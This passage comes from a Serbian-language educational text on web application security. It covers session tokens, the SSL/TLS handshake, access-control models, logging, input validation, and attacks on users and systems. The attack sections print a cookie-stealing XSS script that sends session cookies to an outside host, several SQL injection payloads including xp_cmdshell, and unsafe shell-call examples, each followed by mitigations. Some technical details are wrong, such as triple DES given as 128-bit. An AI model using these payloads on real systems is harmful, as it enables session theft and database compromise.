budu vezani na neki način za specifičnog HTTP klijenta da spreče upade i replay napade. Za jedan domen maksimum cookie-a je 20. Ako imamo stranicu http://www. Ako se cookie-ji šalju HTTP-om.151. vrednost cookie imena Apache je 64. Dakle.

16 . Ako je uhvaćen cookie nekog korisnika. u okviru Netscape Communicator browsera. 3. SSL pruža tri bezbednosne usluge pri transportu podataka. Dodatno. Sesijski tokeni kod kojih ne dolazi do isteka roka validnosti na HTTP serveru mogu omogućiti eventualnom napadaču da pogodi ili brutalno napadne validni autentifikacioni sesijski token. sesijski tokeni se izlažu novom riziku. koji ako im vreme isteka na HTTP serveru ne istekne mogu bi takođe iskorišćeni od strane napadača.1. Takodje je neophodno da u aplikaciji postoji opcija logout. Napadači mogu jednostavno korišćenjem automatskih skriptova “proći kroz” sve mogućnosti. tada napadač može koristiti token sesije da dodje do tog korisničkog naloga. IETF (Internet Engeeniring Task Force) je preuzeo odgovornost za razvoj i unapređenje SSL-a i preimenovao ga u TLS (Transport Layer Security). Da bi sprečili presretanja i brutalne napade na sesije HTTP server može uništavati i regenerisati tokene i time dati napadaču manje vremena da ponovo iskoristi legitiman token. HTTP server privremeno zatvori korisnički nalog ili zabrani pristup sa te IP adrese). Velik broj Web sajtova zabranjuju ponovno neobuzdano nagađanje lozinke (npr. sadrži samo neznatne izmene u odnosu na originalni SSL.Sesijski tokeni koji koriste najjače kriptografske algoritme mogu biti razbijeni ako dužina ključa nije dovoljno velika. Sa popularnošću internet kioska i deljivih računarskih okruženja. Kako je prvobitna verzija SSL-a tehnički bila vlasništvo Netscape-a. Kritične akcije koje vrši korisnik kao što su transfer novca ili značajne narudžbine trebalo bi da zahtevaju od korisnika reautentifikaciju ili generisanje novog sesijskog tokena pre obavljanja važne akcije. ali imajući na umu izračunavanje algoritama i smanjenje širine propusnog opsega dužina ključeva će biti smanjena. verzija 3. SSL je najšire upotrebljavan bezbednosni protokol. Neophodno je da se sesijski tokeni unište kada korisnik napušta aplikaciju. •poverljivost.SSL i TLS Secure Socket Layer (SSL) protokol je projektovan od strane Netscape-a. i kao takav on se ugrađuje u sve komercijalne Web browsere i Web servere. tokeni sesije mogu biti keširani ili upisani u log listu na proxy serveru.3. Napadač može pokušavati stotinama ili hiljadama puta da proba različite tokene da pošalje preko URL-a ili cookie-a bez ograničenja servera. Prva verzija TLS-a. To su: •autentifikacija. Jedan primer je opcija “Zapamti me” na mnogim manjim e-komerc sajtovima. •integritet podataka. Browser uništava session cookie samo po završetku njegovog rada. Ključevi tokena moraju biti dovoljno veliki da spreče ovakve brutalne napade.

SSL pruža samo gore navadene usluge. Zbog jednostavnosti. U oba slučaja SSL se uspostavlja pre nego što počne HTTP transkacija.Server odgovara na pozdravnu poruku sa jednom od svojih poruka koja određuje verziju SSL protokola. SSL sertifikat je u stvari X. Često se može čuti pojam SSL setifikata. šifru i dužinu ključa koji će se koristiti prilikom konverzacije. SMTP.SSL pregovaranje sa autentifikacijom samo servera SSL pregovaranje sa autentifikacijom samo servera je postupak od devet koraka. Prvi je kada se uspostavi SSL tunel i jedino je server autentifikovan. simetričnog šifrovaja. 3. na osnovu ponuđenih vrednosti u okviru klijentske pozdravne poruke. SOAP i drugi.3.509 sertifikat. To znači da ga mogu koristiti svi protokoli aplikacionog nivoa koji za transport koriste TCP.Prvi korak u procesu je kada klijent šalje serveru «Client Hello» poruku. SSL radi na transportnom nivou neposredno iznad TCP.2. Većina modernih browsera automatski proveravaju sertifikat (u zavisnosti od konfiguracije) i upozoravaju korisnika ako isti nije validan. Nedostatke pri korišćenju SSL-a za sesijski transport nemoguće je otkloniti ili ublažiti upotrebom SSL-a. XMP RPC. 1.HTTPFTPSMTPSSL ili TSLTCPIP Mesto SSL-a u okviru TCP/IP protokol steka Kao što se vidi na slici socket nivo je logički nivo između transportnog i aplikacionog nivoa u TCP/IP steku. Dakle. koristimo” dovodi u zabludu. Fraza “sajt je 100% bezbedan. SSL koristi i javne ključeve i simetričnu kriptografiju. sam SSL Web aplikaciju ne čini bezbednom. ćemo u daljem tekstu označavati kao SSL. 3. SSL koristi kombinaciju šifrovanja javnim ključem. 3. 17 .3. IMAP. i drugi način kada su i server i klijent autentifikovani. FTP. Ova pozdravna poruka sadrži verziju SSL-a koju klijent podržava. kao i digitalnih sertifikata. SSL/TLS ne pruža nikakvu dodatnu bezbednost nakon što podaci napuste IP stek na bilo kom kraju konekcije.Kako SSL i TLS rade? SSL ima dva osnovna načina rada. Sertifikat je javni ključ kojeg je potpisao neki drugi poverljivi korisnik (sa dodatnim informacijama radi dokaza njegove validnosti). 2.1. a to su na primer HTTP. Nasuprot trvđenju koje se iznosi u mnogim marketingškim kampanjama. oba protokola SSL i TLS. POP3.Server šalje digitalni sertifikat klijentu na uvid.

7. Najjači trenutno dostupan algoritam koji se koristi u okviru SSL-a je triple DES sa dužinom ključa od 128 bita. 8. 6) Klijent dostavlja svoj sertifikat 8) Klijent šalje poruku o proverenom sertifikatu u koju kriptuje deo poznatog teksta koristeći svoj tajni ključ. i na osnovu toga ustanovljava da klijent ima ispravan tajni ključ. pri čemu utvrđuje da li server može takvu poruku da dekodira. Server koristi klijentski sertifikat za dekriptovanje. Drugi takođe vrlo snažan i zbog svoje brzine najviše rasprostranjen protokol je RC4 koji ima dužinu ključa od 128 bita. Snaga postupka zavisi od primenjenog algoritma i dužine ključa. Ako klijent može da pročita ovakvu poruku. Centralno pitanje svakog postupka za šifrovanje je mogućnost njegovog razbijanja. 3.Klijent šalje «Cipher Spec» poruku koja serveru govori da sva buduća komunikacija treba da se vrši sa novim ključem. 9. znači da je pregovaranje uspešno završeno.SSL sa klijentskom i serverskom autentifikacijom SSL pregovaranje sa obostranom autentifikacijom (sa klijentske i serverske strane) je proces od dvanaest koraka.3. 6. te da li je pregovaranje bilo uspešno. 18 . Dodatni koraci su: 4) Server šalje zahtev za sertifikat nakon slanja svog sertifikata.Klijent sada šalje poruku o završetku koristeći novi ključ. 5. odnosno njegova snaga.Server šalje «Change Cipher Spec» poruku koja klijentu govori da sva buduća komunikacija treba da bude kriptovana.Server šalje «Server Done» poruku koja klijenta obaveštava da je server završio početni deo inicijalne sekvence.Server šalje svoju «Finished» poruku kriptovanu sa novim ključem.4.Klijent generiše simetričan ključ i šifruje ga koristeći serverov javni ključ.3.

U idealnom slučaju. itd. Kontrola pristupa odnosi se sveobuhvatniji način kontrolisanja pristupa Web resursima. posedovanje odgovarajućeg odobrenja. DAC model kontrole pristupa često ispoljava jednu ili više od sledećih osobina: -vlasnici podataka mogu međusobno da razmenjuju vlasništvo nad podacima sa ostalim korisnicima. hardverski/softverski token itd. Svaki mehanizam kontrole pristupa koji se koristi za autorizaciju.Diskretna kontrola pristupa Diskretna kontrola pristupa (DAC) podrazumeva ograničavanje pristupa informacijama na osnovu identiteta korisnika i pripadnosti određenim grupama. copy.4. Pojmovi autorizacije i kontrole pristupa često se greškom zamenjuju. vlasnik informacija i resursa je u mogućnosti da menja svoje dozvole po svom nahođenju. ograničavanjem pristupa resursima i ograničavanjem funkcija koje korisnik vrši nad podacima. domen HTTP klijent browsera. 19 . Mnogi od njih sadrže aspekte koji ih čine primenjivim u oblasti Web aplikacija. pod pretpostavkom da se prethodno uspešno autentifikovao.KONTROLA PRISTUPA I AUTORIZACIJA Mehanizmi kontrole pristupa su neophodan i ključni element pri projektovanju bezbednosti svake Web aplikacije. -vlasnici podataka mogu da odrede vrstu pristupa datu ostalim korisnicima (read. neposredno zavisi od efikasnih i zaštićenih kontrola autentifikacije. već i za razvoj i integraciju odrećenih funkcija aplikacije. uključujući ograničenja zasnovana na faktorima kao što su doba dana. broj autetifikacija datog korisnika tog dana. write. Autorizacija zavisi od specifičnih pravila liste kontrole pristupa koju unapred određuju administratori Web aplikacije ili vlasnici podataka. -višestruko neuspešno ponavljanje pokušaja autorizacije pristupa istom resursu ili objektu generiše alarm i/ili ograničava korisnikov pristup. ili neka izvedena promenjiva koja se može sa lakoćom obraditi. Autorizacija podrazumeva proveru da se vidi da li korisnik ima odgovarajuću dozvolu da pristupi određenom fajlu ili da izvrši određenu akciju. Odluka o pristupu je zasnovana na autorizaciji datoj korisniku na osnovu njegovih akreditiva (username. 4. posedovanje određenog broja hardverskih/ softverskih tokena.) u trenutku autentifikacije. Tipična provera autorizacije uključuje ispitivanje članstva u određenoj grupi korisnika. lozinka. U većini DAC modela. IP adresa HTTP klijent browsera. U sferi bezbednosti informacionih sistema postoji obilje prihvaćenih modela kontrole pristupa. kontrola pristupa bi trebalo da zaštiti podatke od neautorizovanog gledanja. kao i sistemske resurse ograničavanjem korisnikovih radnji.1. Loša strana DAC-a je to što administrator nije u mogućnosti da centralno menja dozvole nad fajlovima/podacima smeštenim na Web serveru. menjanja i kopiranja. ili prisustvo korisnika na listi odobrenih korisnika resursa. Uopšteno gledano. Web aplikacija bi trebalo da štiti front-end i back-end podatke. Uspešan mehanizam kontrole pristupa predstavljaće kombinaciju sledećih modela i biće upotrebljiv ne samo za upravljanje korisničkim nalozima.). tip enkripcije koju HTTP klijent može da podrži.

) -pristup informacijama je određen na osnovu liste kontrole pristupa koja se oslanja na idedntifikatore korisnika i na pripadanje korisnika određenim grupama.3. -svim podacima je dodeljen sigurnosni nivo. Očigledno. -svi korisnici mogu da pišu dokumente veće poverljivosti nego što im je dodeljena ("poverljivi" korisnik može da proglasi informaciju strogo poverljivom). -svi korisnici mogu da čitaju podatke niže poverljivosti od one što je korisnicima dodeljena ("poverljivi" korisnik može da čita dokumente koji nisu poverljivi). IP adresa ili domen. ovi korisnici zahtevaju različite nivoe pristupa pri vršenju svojih funkcija. -pristup je autorizovan ili ograničen objektima u zavisnosti od doba dana u skladu sa sigurnosnim oznakama resursa i akreditivima korisnika. informacije o verziji. MAC model kontrole pristupa često ispoljava sledeće osobine: -isključivo administratori. MAC obezbeđuje informacije dodeljivanjem oznake osetljivosti informacijama i poređenjem nivoa osetljivosti koji je odobren korisniku. Proces definisanja uloga zasnovan je na analiziranju fundamentalnih ciljeva i strukture organizacije i obično je povezano sa bezbednosnim normama. -svim korisnicima je dozvoljeno čitanje/pisanje nad dokumentima iste poverljivosti koja im je dodeljena ("poverljivi" korisnik ima čitaj/piši pristup samo nad poverljivim dokumentom).). sestra. putanju direktorijuma itd. a ne i vlasnici podataka.2. sigurnosno odobrenje svakom korisniku. i obebzbeđuju da svaki korisnik ima pristup samo onim informacijama za koje ima odobrenje. Na primer. pacijent itd. ime fajla. 4. u zdravstvenim organizacijama uloge koje imaju korisnici mogu biti doktor. mogu da menjaju sigurnosnu oznaku resursa. MAC mehanizmi kontrole pristupa su sigurniji od ostalih mehanizama uz ustupak na račun performansi i udobnosti korisnika pri radu. 4. SSL dužina bita. -pristup je autorizovan ili ograničen objektima u zavisnosti od sigurnosnih karakterstika HTTP klijenta (npr. MAC mehanizmi dodeljuju sigurnosni nivo svim informacijama.Kontrola pristupa zasnovana na ulogama (RBAC) Kod kontrole pristupa zasnovane na ulogama odluke su zasnovane na korisnikovim individualnim ulogama i odgovornostima unutar organizacije ili korisničke baze. Uopšteno govoreći. ali i tipovi Web transakcija kao i njihov dozvoljeni sadržaj u varira u zavisnosti od bezbednosnih normi i relevantnih pravila. -korisnici koji nemaju pristup podacima ne bi trebalo da imaju mogućnost da menjaju atribute tih podataka (veličinu fajla. itd.-specijalni add-on ili plug-in softver potreban HTTP klijentu da bi se korisniku onemogućilo neselektivno kopiranje (copy i paste). 20 .Obavezna (Mandatory) kontrola pristupa Kod obavezne kontrole pristupa (MAC) sprovođenje bezbednosnih normi ne zavisi od samog korisnika Web aplikacije. MAC je pogodan za upotrebu u sistemima izuzetno velike sigurnosti uključujući vojne aplikacije sa više nivoa sigurnosti.

transakcije. -uloge dodeljuje administrator na osnovu relativnih odnosa unutar organizacije ili korisničke baze. -uloge se aktiviraju statički i dinamički u skladu sa odgovaarajućim relacionim trigerima (upit za help. iniciranje novog projekta.). dozvoljen pristup informacijama. -ulogama su dodeljena odobrenja po principu najmanje privilegije. -svaka uloga označava profil koji uključuje sve autorizovane komande. itd. itd. 21 . odakle. -ulogama centralno upravlja administrator ili vođa projekta.RBAC metod kontrole pristupa treba da administatorima Web aplikacija da mogućnost određivanja ko može da vrši koju akciju. kojim redosledom i pod kojim relacionim okolnostima. bezbednosni alarm. kada. RBAC model kontrole pristupa pokazuje sledeće osobine: -uloge se dodeljuju u zavisnosti od organizacione strukture sa naglaskom na organizacione bezbednosne norme.

koje se odnose na Web aplikaciju i njene prateće procese. lokacija u okviru baza podataka ili vlasništvo nad podacima.Event Logging Logging je neophodan za dobijanje ključnih informacija o bezbednosti. U ovom slučaju obrada log zapisa je od klujčne važnosti. stvaranje log zapisa treba da obuhvati infomacije korisne za otklanjanje grešaka.1. connect. resurse ili funkcije koje su bile autorizovane kao i identifikaciju korisnika koji je pokušao autorizaciju. kao što su vreme događaja. -za mrežnu komunikaciju treba napraviti log u svakoj tački komunikacije (bind. neuspelo logovanje.PRAĆENJE RADA . -log zapisi su korisni prilikom rekonstrukcije događaja nakon pojave problema.5. -svi neautorizovani pokušaji treba sadrže vreme. itd. -log zapisi su neretko opotrebljavaju u sudskim procesima kao dokaz zloupotrebe.).). -sve događaje vezane za autentifikaciju (logovanje. accept. kao i detaljan opis procesa. treba da bude obuvhaćena logom. Preporučljivo je beležiti sledeće tipove događaja u aplikacijama: -čitanje podataka. itd. -izmena bilo kakvih karakteristika podataka. 5. -upis podataka. -log zapisi omogućuju uvođenje individulne odgovornosti praćenjem korisnikovih akcija. -sve administativne funkcije (rad sa korisničkim nalozima. -u slučaju brisanja bilo kakih podataka treba napraviti log zapis. Stvaranje detaljnih log zapisa o pristupu i transakcijama je važno iz više razloga: -log zapisi su često jedini zapis koji ukazuje da postoji sumnjivo ponašanje. Nedostatak ili neadekvatna upotreba mehanizama za stvaranje log zapisa umanjuje mogućnost otkrivanja neautorizovanih pokušaja pristupa i ne pruža informaciju koji su od tih pokušaja bili uspešni. odjavljivanje. iniciranje. i u nekim slučajevima se mogu u realnom vremenu diretko unositi u sisteme za deteketovanje neovlašćenog upada.) -raznovrsne informacije vezane za otklanjanje grešaka. omogućavanje i onemogućavanje logovanja. uključujući dozvole ili oznake kontrole pristupa. razgledanje korisničkih podataka. itd. 22 .Šta uneti u log zapis Uopšteno govoreći. vezanih za bezbednost ili problema uopšte. informaciju o uspešnosti. poreklo. Rekonstrukcija događaja daje bezbednosnom administratoru potpun uvid u sve aktivnosti uljeza.

nedeljno. U idealnom slučaju log zapise bi trebalo prikupljati i organizovati na posebno dodeljenom logging hostu.Obrada log zapisa Efikasna obrada i skadištenje log zapisa je važna za pravilno korišćenje mogućnosti Web servera i aplikacija koje se odnose na logging. 23 . Ovaj vremenski server treba da bude dodatno zaštićen i ne treba da pruža nikakve dodatne usluge unutar mreže. kao što je CD-R. Mrežne konekcije. Log zapisi se mogu unositi u realnom vremenu u sistem za detekciju upada. mesečno itd).5. Nepravilna obrada i skladištenje informacija od strane mehanizama za logging može dovesti do gubitka ovih podataka i njihove neupotrebljivosti za dalje naknadne analize ili ih učiniti pravno neupotrebljivim. Radi lakšeg indeksiranja potrebno je usvojiti konvenciju u nazivima log zapisa. kao i sadržaj log zapisa trebalo bi enkriptovati tako da se zaštiti poverljivost i integritet podataka koliko je to moguće. Sve komponente logovanja treba da budu sinhronizovane sa vremenskim serverom . log zapise bi trebalo skladištiti na uređajima koji omogućuju jedan upis i više isčitavanja. kao i u alatke za nadzor sistema i performansi.2. Log fajlove i medijume na kojima se oni nalaze treba brisati i uništavati u skladu sa politikom vaše organizacije za odlaganje i uništavanje medija bezbednosno osetljivog sadržaja. Potrebno je praviti izveštaje uključujući izveštaje o greškama i o detektovanim anomalijama. Log fajlove bi trebalo kopirati i skladištiti na trajne medijume i čuvati u skladu sa opštim pravilima vaše organizacije o bekapovanju. tako da svi log zapisi mogu biti obrađeni bez grešaka usled kašnjenja. Atributi log zapisa treba da budu takvi da je moguće samo dodavanje novih informacija (stari unosi ne mogu se prepravljati ili brisati). Kopije log zapisa bi trebalo praviti u pravilnim vremenskim intervalima u zavisnosti od količine podataka u logu i same njegove veličina (dnevno. U skladu sa prethodnim.

Validno korisničko ime se može definisati kao skup ASCII karaktera A-Z i 0-9. projektovanje optimalne arhitekture biće znatno teže nego u slučaju kada je aplikacija tek u fazi projektovanja. -odbacivanje podataka za koje se zna da nisu validni.Prihvati samo poznate validne podatke Kao što je rečeno. tada jedna od komponenti može da filtrira sve ulaze i izlaze. Treba istaći da je prva strategija daleko najbolja. ovo je najpoželjniji način validacije podataka. i na taj način optimizuje pravila i smanji trud. aplikacija treba da proveri da li su poslati brojni podaci a ne stringovi.Validacija podataka je jedan od ključnih aspekata pri projektovanju Web aplikacije. Aplikacija treba da proveri da li se ulazni string sadrži od karaktera A-Z i 0-9 i da li njegova dužina ne prelazi dozvoljenu. ili se opasnost od njihove pojave može značajno smanjiti odgovarajućom validacijom podataka. 6. Ako je aplikacija već u postupku izrade. Postoje tri osnovna modela koja se razmatraju prilikom projektovanja strategije validacije podataka: -prihvatanje samo onih podataka za koje se zna da su validni. Aplikacija prihvata samo očekivani unos. Provera tipa podataka je od izuzetne važnosti.Strategije validacije Strategija validacije podataka je usko povezana sa arhitekturom same aplikacije. za koji se zna da je bezbedan. -dužinu.1. Na primer. -sintaksu. pretpostavimo sistem za postavljanje uzima username kao ulaz.6.VALIDACIJA PODATAKA Najveći deo napada na sistem se može sprečiti. U slučaju da sistem zahteva tipičan sistematičan pristup u pružanju osnovnih usluga. 6. Sve tri metode treba da provere: -tip podataka.1.1. Moramo priznati da ona nije uvek izvodljiva zbog finansijskih ili tehničkih razloga. 24 . tako da ćemo opisati i druge dve strategije. tako i na «skidanje» podataka sa aplikacije. Kada govorima o validaciji podataka mislimo kako na unos podataka u aplikaciju. -saniraranje podataka koji nisu validni. Na primer.

6. kao što je JavaScript. mnogo sajtova još uvek vrši validaciju korisnika. U slučaju validacije podataka sa strane klijenta.Saniraj sve podatke Pokušaj da se loši podaci učine bezopasnim je efikasan kao pomoćna metoda odbrane. Validacija sa strane klijenta. pa ipak. a da se na strani klijenta izvršava samo površna kontrola.1. Međutim.Nikada se ne oslanjati na validaciju podataka sa strane klijenta Validacija sa strane klijenta uvek može biti premošćena.1. te da ih menja po svojoj volji. veoma je teško održavati ažurnom bazu podataka koja sadrži podatke o karakteristikama napada na Web aplikacije. Svaka validacija trebalo bi da se odvija isključivo na strani servera. ali se ne može smatrati pravim postupkom validacije. 6. 6.2. Validacija svih podataka mora se obavljati na poverljivom serveru ili pod kontrolom aplikacije. napadač može da prati povratne vrednosti. uključujući logovanje. je prihvatljiva. 25 .2. sa strane jednostavnosti i lakoće upotrebe. Iako je tačno da ovakva strategija može da ograniči otkrivanje.Odbaci podatke za koje se zna da nisu validni Ova strategija je zasnovana na činjenici da je aplikacija upoznata sa specifičnim malicioznim paketima.3. Ovo izgleda iznenađujuće jednostavno. kako je opisano u prethodnom paragrafu. koristeći samo kod sa strane klijenta. posebno kada je kombinovana sa obacivanjem podataka koji nisu validni. ovakav način je izuzetno težak i ne treba ga koristiti kao osnovno sredstvo zaštite.

JavaScript kod će se automatski pokrenuti i preusmeriti korisnika na specificiranu URL adresu. koja je ujedno i zaražena malicioznim kodom. te će vratiti korisniku traženu stranicu sa dodatim malicioznim kodom koji je dodat sa zahtevom.1. Napad se odvija na taj način da napadač.html). CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests (http://www. nego su sposobni da izvršavaju veći broj akcija. kroz propuste u samom skriptu. Ukoliko se prilikom ispisa naslova svake pojedine poruke. Klijenti prevarom mogu biti uvučeni u izvršavanje većeg broja različitih funkcija što može biti opasno. postoji mogućnost CSS napada. Maliciozni kod se tada pokreće uz odobrenje legalnog skripta poslatog sa legitimnog Web servera. Moderni skript jezici. Ime potiče od CERT saveta. Kada korisnik zatraži stranicu koja ispisuje poruke elektronske pošte.1. Napadač je prethodno otkrio aplikaciju koja ne filtrira ulaz. skript može da vrši funkcije u ime korisnika. više ne vrše samo formatiranje strana. on ispisuje bez proveravanja. Kada korisnikov browser primi novu stranicu. Ako napadač odabere Web aplikaciju za koju je korisnik autentifikovan. Deo koda namenjen za ispis je: <?php echo ?> "<TD>". Kada Web server primi zahtev za stranicom on šalje traženu stranicu zajedno sa delom koda koji je tražen.1.7.Napadi na korisnike 7.Cross-site scripting Cross-site scripting je privukao veliku pažnju javnosti. međutim.cert. zajedno sa sesijskim 26 . preko Web servera. U ovom slučaju napadač može naslovu poruke elektronske pošte pridružiti JavaScript kod koji je dizajniran da otuđi korisnikov sesijski token. korisniku (koji je meta napada) pošalje stranicu koju je korisnik i zahtevao. Korisnik upotrebljava Web aplikaciju namenjenu pregledanju elektronske pošte. tako da korisnik poseduje validni sesijski token. Pretpostavka je da je korisnik prošao fazu autentifikacije i sesija je započeta. Korisnik se prevarom navodi da napravi specifičan i pažljivo projektovan HTTP zahtev. "</TD>". Napadi se uvek odnose na korisnike sistema.BEZBEDNOSNI PROBLEMI PRI RADU WEB APLIKACIJA 7. ako je korisnik administrator sistema to je sasvim druga priča.org/advisories/CA-2000-02. maliciozni kod se raspakuje i izvršava. Naravno. Sam postupak napada biće predstavljen preko sledećeg primera. a nikada na sam sistem. koji se izvršavaju sa klijentske strane. Kroz sledeći primer biće prikazani mogući propusti u PHP aplikacijama koji dozvoljavaju CSS napade. $naslov.

html 27 . U PHP-u.cert. koja konvertuje specijalne karaktere u HTML entitete. prihvata se samo očekivan ulaz. Ako prihvatite preporučenu strategiju validacije.tokenom. biće konvertovani karakteri < i > u njihove odgovarajuće entitete: &lt i &gt. JavaScript kod koji bi omogućio opisan način napada mogao bi izgledati ovako: <script> self.location. http://www. cookie) </script> Mitigation Techniques (tehnike ublažavanja) Sprečavanje cross site scriptinga je zahtevan zadatak posebno za široko distribuirane Web aplikacije. ako svi zahtevi dolaze na centralnu lokaciju i odlaze sa centralne lokacije. U ovom konkretnom primeru. Napadač mora proveriti zapise koji su pristigli na ovakav načini i može preuzeti korisničku sesiju.nesiguran. problem se znatno smanjuje (osim u slučaju kada je potrebno da HTML bude ulaz). tj. problem je lakše rešiti opštom komponentom.com/getCookie?cookies=+escape(document. Moramo naglasiti da je ova strategija daleko najbolja.href=http://www. Prilikom učitavanja Web stranice ništa se neće dogoditi jer će ovi entiteti korisnikovom Web browseru ukazivati na običan tekst a ne specijalne karaktere. Sa stanovišta arhitekture. ovakva ranjivost bi se mogla ispraviti upotrebom htmlspecialchars() funkcije.org/tech_tips/malicious_code_mitigation.

dva puta zbog sigurnosti . U bazi podataka se proverava da li postoji slog koji sadrži zadate akreditive. 28 . SQL injection može da se upotrebi i za: -izmenu SQL vrednosti. Loše projektovana Web aplikacija omogućava hakerima da proizvoljno skidaju prvobitni i postavljaju svoj sadržaj na službenim sistemima. Korisniku je naizgled ovo sasvim jasan proces. Kada korisnik unese staru i dva puta novu lozinku u Web obrazac. -proširivanje SQL izraza. U prethodnom primeru upotrebljena je tehnika ubacivanja dodatnog upita na prvobitni upit bazi podataka. Pretpostavimo da Web aplikacija dopušta korisniku izmenu lozinke.1. Ovakav napad. zatim unosi staru i novu lozinku. Tipičan kod za autentifikaciju bi izgledao ovako: $sql="SELECT * FROM users WHERE username='$username' AND password='$password'". odabira promenu lozinke.2. Korisnik je preko forme poslao serveru svoje korisničko ime i lozinku koji se unose u SQL upit i prosleđuju bazi podataka. što je slučaj sa većinom Web aplikacija. je iznenađujuće jednostavan. onemogućavajući pristup pravim vlasnicima sistema i otvarajući sebi neograničen pristup.Direktne SQL naredbe Kod nekih aplikacija se ne vrši validacija korisničkog unosa. Što znači da će aplikacija smatrati korisnika autentifikovanim jer je uslov '1'='1' uvek ispunjen.7. Zbog zaštite podataka u tranzitu. -modifikacija izlaznih podataka. korisnik je prošao autentifikaciju. $res = $conn->Execute($sql).2. -dodavanje funkcija poziva i procedura za skladištenje postojećim SQL naredbama. browser upućuje HTTP zahtev Web aplikaciji i šalje joj podatke.Napadi na sistem 7. U slučaju da postoji. Ukoliko je korisnik u formu za autentifikaciju uneo sledeći kod: Korisničko ime: ' OR '1'='1 Lozinka: ' OR '1'='1 Vrednost promenljive $sql će biti: $sql="SELECT * FROM users WHERE username='' OR '1'='1' AND password='' OR '1'='1'". što znači da je zlonamernom korisniku omogućen direktan pristup bazi podataka. ovo bi trebalo da se vrši preko SSL-a. poznat kao SQL injection. else $boolAuthenticated=true. Posledice su razarajuće. Korisnik se loguje i kreće kroz stranicu sa opcijama za korisnčki nalog. Napadač je u mogućnosti da menja administratorske lozinke po svom nahođenju. if ($res->RecordCount()==0) $boolAuthenticated=false.

Modifikacija izlaznih podataka: SELECT id.concat(uname|| '-'||passwd)+as+i_name+'1'+' Tehnike ublažavanja Sprečavanje SQL injection-a je zahtevan zadatak posebno za velike Web sisteme. a potrebno je da algoritam prepozna na koju bazu podataka se takav upit odnosi.exe+/c) SELECT id.none. te njegovo izbegavanje može biti neophodno.none.to/script?0'.Izmena SQL vrednosti: UPDATE usertable SET pwd='$INPUT[pwd]' WHERE uid='$INPUT[uid]'. Na primer. ne može se dozvoliti da ovakav karakter postane deo upita za bazu podataka.x_nr.'1'. međutim ovakav pristup ne može da zaustavi sve SQL injection napade.to/script?0'.none.EXEC+master. Međutim.insert+into+pg_shadow+usename+values+('hosch i') Dodavanje funkcija poziva i procedura za skladištenje postojećim SQL naredbama Maliciozni HTTP zahtev: http://www. Primena preporučene strategije za validaciju ulaznih podataka značajno smanjuje problem.--% Proširivanje SQL naredbi: SELECT id. Različite baze podataka zahtevaju da se različiti karakteri izbegavaju na razne načine. te je potrebno za svaku bazu poznavati karaktere koje je potrebno sanirati. Maliciozni HTTP zahtev: http://www. sastavljene iz više aplikacija. Pored toga mogu se javiti teškoće pri implementaciji u slučaju kada algoritam filtriranja treba da odluči da li dotični podaci treba da postanu deo upita ili ne.last_update.to/script?size=0'+union+select+'1'. Unos ovakvog karaktera mora biti dozvoljen pošto je to sastavni deo imena. Maliciozni HTTP zahtev: http://www. Korisni linkovi: 29 .name FROM products WHERE id LIKE '%$INPUT[prod]%'.name FROM products WHERE id LIKE '%$INPUT[prod]%'.none.i_name.xp_cmdshell(cmd.'1'..size FROM p_table WHERE size = Maliciozni HTTP zahtev: http://www. korisnik koji u obrazac unese prezime “O’Neil” ujedno unosi i specijalan metakarakter (’). Filtriranje SQL naredbi neposredno pre izvršavanja smanjuje rizik od pogrešnog filtriranja.t_nr.to/script?pwd=ngomo&uid=1'+or+uid+like'%25admin%25'.

$to. ali ne podržava binarne podatke. Dalje. Izvršavanje spoljšnjih programa sa imenima ili argumentima specificiranim od strane korisnika je najbolja ilustracija direktne štete koju neovlašćeni korisnik može izazvati pozivom direktnih OS naredbi.asp http://www.2. slanje email-ova i pozivanje alatki operativnog sistema u cilju različitih izmena na ulazu i izlazu (filtriranje) aplikacija.spidynamics. sistemskih naredbi. poziv funkcije poput: exec ('program'` .pdf http://www.izvršava naredbu u argumentu i vraća sav generisani izlaz programa direktno u udaljeni Web browser. w). U sledećem primeru prikazano je nepravilno korišćenje popen() funkcije: <?php $f = popen(`/usr/sbin/sendmail -i`. međutim ove funkcije predstavljaju vrlo visok bezbednosni rizik u kombinaciji s korisničkim unosom. Poziv funkcije system($unos_korisnika) je nesiguran jer dozvoljava korisniku da izvršava proizvoljne naredbe na Web serveru. potrebno je koristiti escapeshellarg() ili escapeshellcmd() funkcije. dozvoljava korisniku upotrebu znakova koji imaju specijalno značenje.sqlsecurity. pa i kod mnogih aplikacija sreće se ovakva funkcionalnost.nextgenss.com/papers/advanced_sql_injection. Ovakvi pozivi su vrlo opasni jer PHP uvek prosleđuje ovakve nizove direktno na izvršavanje. stoji upozorenje da ukoliko se funkcijama predaju podaci uneseni od strane korisnika.2. •system() .Direktne OS naredbe Skoro svi programski jezici dopuštaju upotrebu tzv. koje se odnose na ove funkcije. Najčešća primena ovih naredbi u Web aplikacijama je manipulacija fajlovima (uklanjanje.pdf 7.com/papers/more_advanced_sql_injection. Operativni sistem izvršava dati unos i vraća odgovarajući izlaz na stdout zajedno sa različitim povratnim kodovima kao što su “uspešno”. •popen() .izvršava naredbu u argumentu i vraća zadnju liniju izlaza programa.pdf http://www. Nekad je poziv spoljašnjih programa neophodan. Sistemske naredbe mogu da budu veoma ugodna alatka za rad.nextgenss.com/papers/SQLInjectionWhitePaper. itd.http://www.kao i passthru (). $arg_korisnika). Sistemski interfejs u programskom i skript jeziku prepušta unos (naredbe) samom operativnom sistemu. U uputstvima za PHP jezik.com/faq-inj. Funkcije koje se koriste u PHP skript jeziku prilikom poziva spoljašnjih programa su sledeće: •exec() .izvršava naredbu u argumentu. koje se uz malo truda mogu integrisati u aplikaciju . kopiranje). “neuspešno”. •passthru() . ?> 30 .

